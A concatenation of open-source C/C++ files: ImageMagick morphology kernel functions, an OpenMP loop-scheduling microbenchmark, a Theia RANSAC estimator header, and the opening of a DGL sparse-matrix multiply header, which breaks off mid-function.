%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% MorphologyImage() applies a user supplied kernel to the image according to
% the given mophology method.
%
% This function applies any and all user defined settings before calling
% the above internal function MorphologyApply().
%
% User defined settings include...
% * Output Bias for Convolution and correlation ("-define convolve:bias=??")
% * Kernel Scale/normalize settings ("-define convolve:scale=??")
% This can also includes the addition of a scaled unity kernel.
% * Show Kernel being applied ("-define morphology:showkernel=1")
%
% Other operators that do not want user supplied options interfering,
% especially "convolve:bias" and "morphology:showkernel" should use
% MorphologyApply() directly.
%
% The format of the MorphologyImage method is:
%
% Image *MorphologyImage(const Image *image,MorphologyMethod method,
% const ssize_t iterations,KernelInfo *kernel,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o method: the morphology method to be applied.
%
% o iterations: apply the operation this many times (or no change).
% A value of -1 means loop until no change found.
% How this is applied may depend on the morphology method.
% Typically this is a value of 1.
%
% o kernel: An array of double representing the morphology kernel.
% Warning: kernel may be normalized for the Convolve method.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport Image *MorphologyImage(const Image *image,
const MorphologyMethod method,const ssize_t iterations,
const KernelInfo *kernel,ExceptionInfo *exception)
{
const char
*artifact;
CompositeOperator
compose;
double
bias;
Image
*morphology_image;
KernelInfo
*curr_kernel;
curr_kernel = (KernelInfo *) kernel;
bias=0.0;
compose = UndefinedCompositeOp; /* use default for method */
/* Apply Convolve/Correlate Normalization and Scaling Factors.
* This is done BEFORE the ShowKernelInfo() function is called so that
* users can see the results of the 'option:convolve:scale' option.
*/
if ( method == ConvolveMorphology || method == CorrelateMorphology ) {
/* Get the bias value as it will be needed */
artifact = GetImageArtifact(image,"convolve:bias");
if ( artifact != (const char *) NULL) {
if (IsGeometry(artifact) == MagickFalse)
(void) ThrowMagickException(exception,GetMagickModule(),
OptionWarning,"InvalidSetting","'%s' '%s'",
"convolve:bias",artifact);
else
bias=StringToDoubleInterval(artifact,(double) QuantumRange+1.0);
}
/* Scale kernel according to user wishes */
artifact = GetImageArtifact(image,"convolve:scale");
if ( artifact != (const char *) NULL ) {
if (IsGeometry(artifact) == MagickFalse)
(void) ThrowMagickException(exception,GetMagickModule(),
OptionWarning,"InvalidSetting","'%s' '%s'",
"convolve:scale",artifact);
else {
if ( curr_kernel == kernel )
curr_kernel = CloneKernelInfo(kernel);
if (curr_kernel == (KernelInfo *) NULL)
return((Image *) NULL);
ScaleGeometryKernelInfo(curr_kernel, artifact);
}
}
}
/* display the (normalized) kernel via stderr */
artifact=GetImageArtifact(image,"morphology:showkernel");
if (IsStringTrue(artifact) != MagickFalse)
ShowKernelInfo(curr_kernel);
/* Override the default handling of multi-kernel morphology results
* If 'Undefined' use the default method
* If 'None' (default for 'Convolve') re-iterate previous result
* Otherwise merge resulting images using compose method given.
* Default for 'HitAndMiss' is 'Lighten'.
*/
{
ssize_t
parse;
artifact = GetImageArtifact(image,"morphology:compose");
if ( artifact != (const char *) NULL) {
parse=ParseCommandOption(MagickComposeOptions,
MagickFalse,artifact);
if ( parse < 0 )
(void) ThrowMagickException(exception,GetMagickModule(),
OptionWarning,"UnrecognizedComposeOperator","'%s' '%s'",
"morphology:compose",artifact);
else
compose=(CompositeOperator)parse;
}
}
/* Apply the Morphology */
morphology_image = MorphologyApply(image,method,iterations,
curr_kernel,compose,bias,exception);
/* Cleanup and Exit */
if ( curr_kernel != kernel )
curr_kernel=DestroyKernelInfo(curr_kernel);
return(morphology_image);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
+ R o t a t e K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% RotateKernelInfo() rotates the kernel by the angle given.
%
% Currently it is restricted to 90 degree angles, of either 1D kernels
% or square kernels. And 'circular' rotations of 45 degrees for 3x3 kernels.
% It will ignore usless rotations for specific 'named' built-in kernels.
%
% The format of the RotateKernelInfo method is:
%
% void RotateKernelInfo(KernelInfo *kernel, double angle)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
% o angle: angle to rotate in degrees
%
% This function is currently internal to this module only, but can be exported
% to other modules if needed.
*/
static void RotateKernelInfo(KernelInfo *kernel, double angle)
{
/* angle the lower kernels first */
if ( kernel->next != (KernelInfo *) NULL)
RotateKernelInfo(kernel->next, angle);
/* WARNING: Currently assumes the kernel (rightly) is horizontally symetrical
**
** TODO: expand beyond simple 90 degree rotates, flips and flops
*/
/* Modulus the angle */
angle = fmod(angle, 360.0);
if ( angle < 0 )
angle += 360.0;
if ( 337.5 < angle || angle <= 22.5 )
return; /* Near zero angle - no change! - At least not at this time */
/* Handle special cases */
switch (kernel->type) {
/* These built-in kernels are cylindrical kernels, rotating is useless */
case GaussianKernel:
case DoGKernel:
case LoGKernel:
case DiskKernel:
case PeaksKernel:
case LaplacianKernel:
case ChebyshevKernel:
case ManhattanKernel:
case EuclideanKernel:
return;
/* These may be rotatable at non-90 angles in the future */
/* but simply rotating them in multiples of 90 degrees is useless */
case SquareKernel:
case DiamondKernel:
case PlusKernel:
case CrossKernel:
return;
/* These only allows a +/-90 degree rotation (by transpose) */
/* A 180 degree rotation is useless */
case BlurKernel:
if ( 135.0 < angle && angle <= 225.0 )
return;
if ( 225.0 < angle && angle <= 315.0 )
angle -= 180;
break;
default:
break;
}
/* Attempt rotations by 45 degrees -- 3x3 kernels only */
if ( 22.5 < fmod(angle,90.0) && fmod(angle,90.0) <= 67.5 )
{
if ( kernel->width == 3 && kernel->height == 3 )
{ /* Rotate a 3x3 square by 45 degree angle */
double t = kernel->values[0];
kernel->values[0] = kernel->values[3];
kernel->values[3] = kernel->values[6];
kernel->values[6] = kernel->values[7];
kernel->values[7] = kernel->values[8];
kernel->values[8] = kernel->values[5];
kernel->values[5] = kernel->values[2];
kernel->values[2] = kernel->values[1];
kernel->values[1] = t;
/* rotate non-centered origin */
if ( kernel->x != 1 || kernel->y != 1 ) {
ssize_t x,y;
x = (ssize_t) kernel->x-1;
y = (ssize_t) kernel->y-1;
if ( x == y ) x = 0;
else if ( x == 0 ) x = -y;
else if ( x == -y ) y = 0;
else if ( y == 0 ) y = x;
kernel->x = (ssize_t) x+1;
kernel->y = (ssize_t) y+1;
}
angle = fmod(angle+315.0, 360.0); /* angle reduced 45 degrees */
kernel->angle = fmod(kernel->angle+45.0, 360.0);
}
else
perror("Unable to rotate non-3x3 kernel by 45 degrees");
}
if ( 45.0 < fmod(angle, 180.0) && fmod(angle,180.0) <= 135.0 )
{
if ( kernel->width == 1 || kernel->height == 1 )
{ /* Do a transpose of a 1 dimensional kernel,
** which results in a fast 90 degree rotation of some type.
*/
ssize_t
t;
t = (ssize_t) kernel->width;
kernel->width = kernel->height;
kernel->height = (size_t) t;
t = kernel->x;
kernel->x = kernel->y;
kernel->y = t;
if ( kernel->width == 1 ) {
angle = fmod(angle+270.0, 360.0); /* angle reduced 90 degrees */
kernel->angle = fmod(kernel->angle+90.0, 360.0);
} else {
angle = fmod(angle+90.0, 360.0); /* angle increased 90 degrees */
kernel->angle = fmod(kernel->angle+270.0, 360.0);
}
}
else if ( kernel->width == kernel->height )
{ /* Rotate a square array of values by 90 degrees */
{ register ssize_t
i,j,x,y;
register MagickRealType
*k,t;
k=kernel->values;
for( i=0, x=(ssize_t) kernel->width-1; i<=x; i++, x--)
for( j=0, y=(ssize_t) kernel->height-1; j<y; j++, y--)
{ t = k[i+j*kernel->width];
k[i+j*kernel->width] = k[j+x*kernel->width];
k[j+x*kernel->width] = k[x+y*kernel->width];
k[x+y*kernel->width] = k[y+i*kernel->width];
k[y+i*kernel->width] = t;
}
}
/* rotate the origin - relative to center of array */
{ register ssize_t x,y;
x = (ssize_t) (kernel->x*2-kernel->width+1);
y = (ssize_t) (kernel->y*2-kernel->height+1);
kernel->x = (ssize_t) ( -y +(ssize_t) kernel->width-1)/2;
kernel->y = (ssize_t) ( +x +(ssize_t) kernel->height-1)/2;
}
angle = fmod(angle+270.0, 360.0); /* angle reduced 90 degrees */
kernel->angle = fmod(kernel->angle+90.0, 360.0);
}
else
perror("Unable to rotate a non-square, non-linear kernel 90 degrees");
}
if ( 135.0 < angle && angle <= 225.0 )
{
/* For a 180 degree rotation - also know as a reflection
* This is actually a very very common operation!
* Basically all that is needed is a reversal of the kernel data!
* And a reflection of the origon
*/
MagickRealType
t;
register MagickRealType
*k;
ssize_t
i,
j;
k=kernel->values;
j=(ssize_t) (kernel->width*kernel->height-1);
for (i=0; i < j; i++, j--)
t=k[i], k[i]=k[j], k[j]=t;
kernel->x = (ssize_t) kernel->width - kernel->x - 1;
kernel->y = (ssize_t) kernel->height - kernel->y - 1;
angle = fmod(angle-180.0, 360.0); /* angle+180 degrees */
kernel->angle = fmod(kernel->angle+180.0, 360.0);
}
/* At this point angle should at least between -45 (315) and +45 degrees
* In the future some form of non-orthogonal angled rotates could be
* performed here, posibily with a linear kernel restriction.
*/
return;
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S c a l e G e o m e t r y K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ScaleGeometryKernelInfo() takes a geometry argument string, typically
% provided as a "-set option:convolve:scale {geometry}" user setting,
% and modifies the kernel according to the parsed arguments of that setting.
%
% The first argument (and any normalization flags) are passed to
% ScaleKernelInfo() to scale/normalize the kernel. The second argument
% is then passed to UnityAddKernelInfo() to add a scled unity kernel
% into the scaled/normalized kernel.
%
% The format of the ScaleGeometryKernelInfo method is:
%
% void ScaleGeometryKernelInfo(KernelInfo *kernel,
% const double scaling_factor,const MagickStatusType normalize_flags)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel to modify
%
% o geometry:
% The geometry string to parse, typically from the user provided
% "-set option:convolve:scale {geometry}" setting.
%
*/
MagickExport void ScaleGeometryKernelInfo (KernelInfo *kernel,
const char *geometry)
{
MagickStatusType
flags;
GeometryInfo
args;
SetGeometryInfo(&args);
flags = ParseGeometry(geometry, &args);
#if 0
/* For Debugging Geometry Input */
(void) FormatLocaleFile(stderr, "Geometry = 0x%04X : %lg x %lg %+lg %+lg\n",
flags, args.rho, args.sigma, args.xi, args.psi );
#endif
if ( (flags & PercentValue) != 0 ) /* Handle Percentage flag*/
args.rho *= 0.01, args.sigma *= 0.01;
if ( (flags & RhoValue) == 0 ) /* Set Defaults for missing args */
args.rho = 1.0;
if ( (flags & SigmaValue) == 0 )
args.sigma = 0.0;
/* Scale/Normalize the input kernel */
ScaleKernelInfo(kernel, args.rho, (GeometryFlags) flags);
/* Add Unity Kernel, for blending with original */
if ( (flags & SigmaValue) != 0 )
UnityAddKernelInfo(kernel, args.sigma);
return;
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S c a l e K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ScaleKernelInfo() scales the given kernel list by the given amount, with or
% without normalization of the sum of the kernel values (as per given flags).
%
% By default (no flags given) the values within the kernel is scaled
% directly using given scaling factor without change.
%
% If either of the two 'normalize_flags' are given the kernel will first be
% normalized and then further scaled by the scaling factor value given.
%
% Kernel normalization ('normalize_flags' given) is designed to ensure that
% any use of the kernel scaling factor with 'Convolve' or 'Correlate'
% morphology methods will fall into -1.0 to +1.0 range. Note that for
% non-HDRI versions of IM this may cause images to have any negative results
% clipped, unless some 'bias' is used.
%
% More specifically. Kernels which only contain positive values (such as a
% 'Gaussian' kernel) will be scaled so that those values sum to +1.0,
% ensuring a 0.0 to +1.0 output range for non-HDRI images.
%
% For Kernels that contain some negative values, (such as 'Sharpen' kernels)
% the kernel will be scaled by the absolute of the sum of kernel values, so
% that it will generally fall within the +/- 1.0 range.
%
% For kernels whose values sum to zero, (such as 'Laplician' kernels) kernel
% will be scaled by just the sum of the postive values, so that its output
% range will again fall into the +/- 1.0 range.
%
% For special kernels designed for locating shapes using 'Correlate', (often
% only containing +1 and -1 values, representing foreground/brackground
% matching) a special normalization method is provided to scale the positive
% values separately to those of the negative values, so the kernel will be
% forced to become a zero-sum kernel better suited to such searches.
%
% WARNING: Correct normalization of the kernel assumes that the '*_range'
% attributes within the kernel structure have been correctly set during the
% kernels creation.
%
% NOTE: The values used for 'normalize_flags' have been selected specifically
% to match the use of geometry options, so that '!' means NormalizeValue, '^'
% means CorrelateNormalizeValue. All other GeometryFlags values are ignored.
%
% The format of the ScaleKernelInfo method is:
%
% void ScaleKernelInfo(KernelInfo *kernel, const double scaling_factor,
% const MagickStatusType normalize_flags )
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
% o scaling_factor:
% multiply all values (after normalization) by this factor if not
% zero. If the kernel is normalized regardless of any flags.
%
% o normalize_flags:
% GeometryFlags defining normalization method to use.
% specifically: NormalizeValue, CorrelateNormalizeValue,
% and/or PercentValue
%
*/
MagickExport void ScaleKernelInfo(KernelInfo *kernel,
const double scaling_factor,const GeometryFlags normalize_flags)
{
register double
pos_scale,
neg_scale;
register ssize_t
i;
/* do the other kernels in a multi-kernel list first */
if ( kernel->next != (KernelInfo *) NULL)
ScaleKernelInfo(kernel->next, scaling_factor, normalize_flags);
/* Normalization of Kernel */
pos_scale = 1.0;
if ( (normalize_flags&NormalizeValue) != 0 ) {
if ( fabs(kernel->positive_range + kernel->negative_range) >= MagickEpsilon )
/* non-zero-summing kernel (generally positive) */
pos_scale = fabs(kernel->positive_range + kernel->negative_range);
else
/* zero-summing kernel */
pos_scale = kernel->positive_range;
}
/* Force kernel into a normalized zero-summing kernel */
if ( (normalize_flags&CorrelateNormalizeValue) != 0 ) {
pos_scale = ( fabs(kernel->positive_range) >= MagickEpsilon )
? kernel->positive_range : 1.0;
neg_scale = ( fabs(kernel->negative_range) >= MagickEpsilon )
? -kernel->negative_range : 1.0;
}
else
neg_scale = pos_scale;
/* finialize scaling_factor for positive and negative components */
pos_scale = scaling_factor/pos_scale;
neg_scale = scaling_factor/neg_scale;
for (i=0; i < (ssize_t) (kernel->width*kernel->height); i++)
if (!IsNaN(kernel->values[i]))
kernel->values[i] *= (kernel->values[i] >= 0) ? pos_scale : neg_scale;
/* convolution output range */
kernel->positive_range *= pos_scale;
kernel->negative_range *= neg_scale;
/* maximum and minimum values in kernel */
kernel->maximum *= (kernel->maximum >= 0.0) ? pos_scale : neg_scale;
kernel->minimum *= (kernel->minimum >= 0.0) ? pos_scale : neg_scale;
/* swap kernel settings if user's scaling factor is negative */
if ( scaling_factor < MagickEpsilon ) {
double t;
t = kernel->positive_range;
kernel->positive_range = kernel->negative_range;
kernel->negative_range = t;
t = kernel->maximum;
kernel->maximum = kernel->minimum;
kernel->minimum = 1;
}
return;
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S h o w K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ShowKernelInfo() outputs the details of the given kernel defination to
% standard error, generally due to a users 'morphology:showkernel' option
% request.
%
% The format of the ShowKernel method is:
%
% void ShowKernelInfo(const KernelInfo *kernel)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
*/
MagickPrivate void ShowKernelInfo(const KernelInfo *kernel)
{
const KernelInfo
*k;
size_t
c, i, u, v;
for (c=0, k=kernel; k != (KernelInfo *) NULL; c++, k=k->next ) {
(void) FormatLocaleFile(stderr, "Kernel");
if ( kernel->next != (KernelInfo *) NULL )
(void) FormatLocaleFile(stderr, " #%lu", (unsigned long) c );
(void) FormatLocaleFile(stderr, " \"%s",
CommandOptionToMnemonic(MagickKernelOptions, k->type) );
if ( fabs(k->angle) >= MagickEpsilon )
(void) FormatLocaleFile(stderr, "@%lg", k->angle);
(void) FormatLocaleFile(stderr, "\" of size %lux%lu%+ld%+ld",(unsigned long)
k->width,(unsigned long) k->height,(long) k->x,(long) k->y);
(void) FormatLocaleFile(stderr,
" with values from %.*lg to %.*lg\n",
GetMagickPrecision(), k->minimum,
GetMagickPrecision(), k->maximum);
(void) FormatLocaleFile(stderr, "Forming a output range from %.*lg to %.*lg",
GetMagickPrecision(), k->negative_range,
GetMagickPrecision(), k->positive_range);
if ( fabs(k->positive_range+k->negative_range) < MagickEpsilon )
(void) FormatLocaleFile(stderr, " (Zero-Summing)\n");
else if ( fabs(k->positive_range+k->negative_range-1.0) < MagickEpsilon )
(void) FormatLocaleFile(stderr, " (Normalized)\n");
else
(void) FormatLocaleFile(stderr, " (Sum %.*lg)\n",
GetMagickPrecision(), k->positive_range+k->negative_range);
for (i=v=0; v < k->height; v++) {
(void) FormatLocaleFile(stderr, "%2lu:", (unsigned long) v );
for (u=0; u < k->width; u++, i++)
if (IsNaN(k->values[i]))
(void) FormatLocaleFile(stderr," %*s", GetMagickPrecision()+3, "nan");
else
(void) FormatLocaleFile(stderr," %*.*lg", GetMagickPrecision()+3,
GetMagickPrecision(), (double) k->values[i]);
(void) FormatLocaleFile(stderr,"\n");
}
}
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% U n i t y A d d K e r n a l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% UnityAddKernelInfo() Adds a given amount of the 'Unity' Convolution Kernel
% to the given pre-scaled and normalized Kernel. This in effect adds that
% amount of the original image into the resulting convolution kernel. This
% value is usually provided by the user as a percentage value in the
% 'convolve:scale' setting.
%
% The resulting effect is to convert the defined kernels into blended
% soft-blurs, unsharp kernels or into sharpening kernels.
%
% The format of the UnityAdditionKernelInfo method is:
%
% void UnityAdditionKernelInfo(KernelInfo *kernel, const double scale )
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
% o scale:
% scaling factor for the unity kernel to be added to
% the given kernel.
%
*/
MagickExport void UnityAddKernelInfo(KernelInfo *kernel,
const double scale)
{
/* do the other kernels in a multi-kernel list first */
if ( kernel->next != (KernelInfo *) NULL)
UnityAddKernelInfo(kernel->next, scale);
/* Add the scaled unity kernel to the existing kernel */
kernel->values[kernel->x+kernel->y*kernel->width] += scale;
CalcKernelMetaData(kernel); /* recalculate the meta-data */
return;
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% Z e r o K e r n e l N a n s %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ZeroKernelNans() replaces any special 'nan' value that may be present in
% the kernel with a zero value. This is typically done when the kernel will
% be used in special hardware (GPU) convolution processors, to simply
% matters.
%
% The format of the ZeroKernelNans method is:
%
% void ZeroKernelNans (KernelInfo *kernel)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
*/
MagickPrivate void ZeroKernelNans(KernelInfo *kernel)
{
register size_t
i;
/* do the other kernels in a multi-kernel list first */
if (kernel->next != (KernelInfo *) NULL)
ZeroKernelNans(kernel->next);
for (i=0; i < (kernel->width*kernel->height); i++)
if (IsNaN(kernel->values[i]))
kernel->values[i]=0.0;
return;
}
|
schedbench.c | /****************************************************************************
* *
* OpenMP MicroBenchmark Suite - Version 3.1 *
* *
* produced by *
* *
* Mark Bull, Fiona Reid and Nix Mc Donnell *
* *
* at *
* *
* Edinburgh Parallel Computing Centre *
* *
* email: markb@epcc.ed.ac.uk or fiona@epcc.ed.ac.uk *
* *
* *
* This version copyright (c) The University of Edinburgh, 2015. *
* *
* *
* Licensed under the Apache License, Version 2.0 (the "License"); *
* you may not use this file except in compliance with the License. *
* You may obtain a copy of the License at *
* *
* http://www.apache.org/licenses/LICENSE-2.0 *
* *
* Unless required by applicable law or agreed to in writing, software *
* distributed under the License is distributed on an "AS IS" BASIS, *
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. *
* See the License for the specific language governing permissions and *
* limitations under the License. *
* *
****************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <math.h>
#include <omp.h>
#include "common.h"
#include "schedbench.h"
int cksz, itersperthr = 8192;
char testName[32];
int main(int argc, char **argv) {
init(argc, argv);
// Also print itersperthr
printf("\t%d iterations per threads\n", itersperthr);
/* GENERATE REFERENCE TIME */
reference("reference time", &refer);
/* TEST STATIC */
benchmark("STATIC", &teststatic);
/* TEST STATIC,n */
cksz = 1;
while (cksz <= itersperthr) {
sprintf(testName, "STATIC %d", cksz);
benchmark(testName, &teststaticn);
cksz *= 2;
}
/* TEST DYNAMIC,n */
cksz = 1;
while (cksz <= itersperthr) {
sprintf(testName, "DYNAMIC %d", cksz);
benchmark(testName, &testdynamicn);
cksz *= 2;
}
/* TEST GUIDED,n */
cksz = 1;
while (cksz <= itersperthr / nthreads) {
sprintf(testName, "GUIDED %d", cksz);
benchmark(testName, &testguidedn);
cksz *= 2;
}
finalise();
return EXIT_SUCCESS;
}
void refer() {
int i, j;
for (j = 0; j < innerreps; j++) {
for (i = 0; i < itersperthr; i++) {
delay(delaylength);
}
}
}
void teststatic() {
int i, j;
#pragma omp parallel private(j)
{
for (j = 0; j < innerreps; j++) {
#pragma omp for schedule(static)
for (i = 0; i < itersperthr * nthreads; i++) {
delay(delaylength);
}
}
}
}
void teststaticn() {
int i, j;
#pragma omp parallel private(j)
{
for (j = 0; j < innerreps; j++) {
#pragma omp for schedule(static,cksz)
for (i = 0; i < itersperthr * nthreads; i++) {
delay(delaylength);
}
}
}
}
void testdynamicn() {
int i, j;
#pragma omp parallel private(j)
{
for (j = 0; j < innerreps; j++) {
#pragma omp for schedule(dynamic,cksz)
for (i = 0; i < itersperthr * nthreads; i++) {
delay(delaylength);
}
}
}
}
void testguidedn() {
int i, j;
#pragma omp parallel private(j)
{
for (j = 0; j < innerreps; j++) {
#pragma omp for schedule(guided,cksz)
for (i = 0; i < itersperthr * nthreads; i++) {
delay(delaylength);
}
}
}
}
|
estimator.h | // Copyright (C) 2013 The Regents of the University of California (Regents).
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following
// disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of The Regents or University of California nor the
// names of its contributors may be used to endorse or promote products
// derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE
// LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
// SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
// INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
// CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//
// Please contact the author of this library if you have any questions.
// Author: Chris Sweeney (cmsweeney@cs.ucsb.edu)
#ifndef THEIA_SOLVERS_ESTIMATOR_H_
#define THEIA_SOLVERS_ESTIMATOR_H_
#include <glog/logging.h>
#ifdef THEIA_USE_OPENMP
#include <omp.h>
#endif
#include <vector>
namespace theia {
// Templated class for estimating a model for RANSAC. This class is purely a
// virtual class and should be implemented for the specific task that RANSAC is
// being used for. Two methods must be implemented: EstimateModel and Error. All
// other methods are optional, but will likely enhance the quality of the RANSAC
// output.
//
// NOTE: RANSAC, ARRSAC, and other solvers work best if Datum and Model are
// lightweight classes or structs.
template <typename DatumType, typename ModelType>
class Estimator {
public:
typedef DatumType Datum;
typedef ModelType Model;
Estimator() {}
virtual ~Estimator() {}
// Get the minimum number of samples needed to generate a model.
virtual double SampleSize() const = 0;
// Given a set of data points, estimate the model. Users should implement this
// function appropriately for the task being solved. Returns true for
// successful model estimation (and outputs model), false for failed
// estimation. Typically, this is a minimal set, but it is not required to be.
virtual bool EstimateModel(const std::vector<Datum>& data,
std::vector<Model>* model) const = 0;
// Estimate a model from a non-minimal sampling of the data. E.g. for a line,
// use SVD on a set of points instead of constructing a line from two points.
// By default, this simply implements the minimal case.
virtual bool EstimateModelNonminimal(const std::vector<Datum>& data,
std::vector<Model>* model) const {
return EstimateModel(data, model);
}
// Refine the model based on an updated subset of data, and a pre-computed
// model. Can be optionally implemented.
virtual bool RefineModel(const std::vector<Datum>& data, Model* model) const {
return true;
}
// Given a model and a data point, calculate the error. Users should implement
// this function appropriately for the task being solved.
virtual double Error(const Datum& data, const Model& model) const = 0;
// Compute the residuals of many data points. By default this is just a loop
// that calls Error() on each data point, but this function can be useful if
// the errors of multiple points may be estimated simultanesously (e.g.,
// matrix multiplication to compute the reprojection error of many points at
// once).
virtual std::vector<double> Residuals(const std::vector<Datum>& data,
const Model& model) const {
std::vector<double> residuals(data.size());
#pragma omp parallel for
for (int i = 0; i < data.size(); i++) {
residuals[i] = Error(data[i], model);
}
return residuals;
}
// Returns the set inliers of the data set based on the error threshold
// provided.
std::vector<int> GetInliers(const std::vector<Datum>& data,
const Model& model,
double error_threshold) const {
std::vector<int> inliers;
inliers.reserve(data.size());
for (int i = 0; i < data.size(); i++) {
if (Error(data[i], model) < error_threshold) {
inliers.push_back(i);
}
}
return inliers;
}
// Enable a quick check to see if the model is valid. This can be a geometric
// check or some other verification of the model structure.
virtual bool ValidModel(const Model& model) const { return true; }
};
} // namespace theia
#endif // THEIA_SOLVERS_ESTIMATOR_H_
|
spmm.h | /*!
* Copyright (c) 2020 by Contributors
* \file array/cpu/spmm.h
* \brief SPMM CPU kernel function header.
*/
#ifndef DGL_ARRAY_CPU_SPMM_H_
#define DGL_ARRAY_CPU_SPMM_H_
#include <dgl/array.h>
#include <dgl/bcast.h>
#include <limits>
#include <algorithm>
namespace dgl {
namespace aten {
namespace cpu {
/*!
* \brief CPU kernel of SpMM on Csr format.
* \param bcast Broadcast information.
* \param csr The Csr matrix.
* \param ufeat The feature on source nodes.
* \param efeat The feature on edges.
* \param out The result feature on destination nodes.
* \note it uses node parallel strategy, different threads are responsible
* for the computation of different nodes.
*/
template <typename IdType, typename DType, typename Op>
void SpMMSumCsr(
const BcastOff& bcast,
const CSRMatrix& csr,
NDArray ufeat, NDArray efeat,
NDArray out) {
const bool has_idx = !IsNullArray(csr.data);
const IdType* indptr = csr.indptr.Ptr<IdType>();
const IdType* indices = csr.indices.Ptr<IdType>();
const IdType* edges = csr.data.Ptr<IdType>();
const DType* X = ufeat.Ptr<DType>();
const DType* W = efeat.Ptr<DType>();
int64_t dim = bcast.out_len,
lhs_dim = bcast.lhs_len,
rhs_dim = bcast.rhs_len;
DType* O = out.Ptr<DType>();
#pragma omp parallel for
for (IdType rid = 0; rid < csr.num_rows; ++rid) {
const IdType row_start = indptr[rid], row_end = indptr[rid + 1];
DType* out_off = O + rid * dim;
for (int64_t k = 0; k < dim; ++k) {
DType accum = 0;
for (IdType j = row_start; j < row_end; ++j) {
const IdType cid = indices[j];
const IdType eid = has_idx? edges[j] : j;
const int64_t lhs_add = bcast.use_bcast ? bcast.lhs_offset[k] : k;
const int64_t rhs_add = bcast.use_bcast ? bcast.rhs_offset[k] : k;
const DType* lhs_off = Op::use_lhs? X + cid * lhs_dim + lhs_add : nullptr;
const DType* rhs_off = Op::use_rhs? W + eid * rhs_dim + rhs_add : nullptr;
accum += Op::Call(lhs_off, rhs_off);
}
out_off[k] = accum;
}
}
}
/*!
* \brief CPU kernel of SpMM on Coo format.
* \param bcast Broadcast information.
* \param coo The Coo matrix.
* \param ufeat The feature on source nodes.
* \param efeat The feature on edges.
* \param out The result feature on destination nodes.
* \note it uses node parallel strategy, different threads are responsible
* for the computation of different nodes. To avoid possible data hazard,
* we use atomic operators in the reduction phase.
*/
template <typename IdType, typename DType, typename Op>
void SpMMSumCoo(
const BcastOff& bcast,
const COOMatrix& coo,
NDArray ufeat, NDArray efeat,
NDArray out) {
